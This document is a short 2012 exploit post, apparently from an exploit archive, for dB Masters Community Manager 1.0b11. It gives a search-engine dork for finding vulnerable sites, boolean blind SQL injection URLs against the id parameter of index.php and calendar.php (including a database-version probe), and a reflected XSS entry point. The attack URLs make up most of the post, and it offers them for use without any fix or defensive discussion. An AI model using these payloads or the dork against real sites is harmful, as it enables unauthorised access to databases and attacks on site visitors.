facebook facebook twitter rss

Community Manager 1.0b11 Blind Injection/XSS Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 20-06-2012
#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.dbmasters.net/
.:. Dork : "Powered by dB Masters Multimedia's Community Manager 1.0b11"
#######################################################################

===[ Exploit ]===


Multiple Blind Injection
=======================
http://SITE/index.php?id=Blind Injection
http://SITE/calendar.php?id=Blind Injection


http://SITE/index.php?id=100+and+1=1 True
http://SITE/index.php?id=100+and+1=2 False

http://SITE/index.php?id=100+and+substring(@@version,1,1)=5 True
http://SITE/index.php?id=100+and+substring(@@version,1,1)=4 False



Reflected XSS
==============

http://SITE/calendar.php?id=XSS Code

#######################################################################

Like us on Facebook :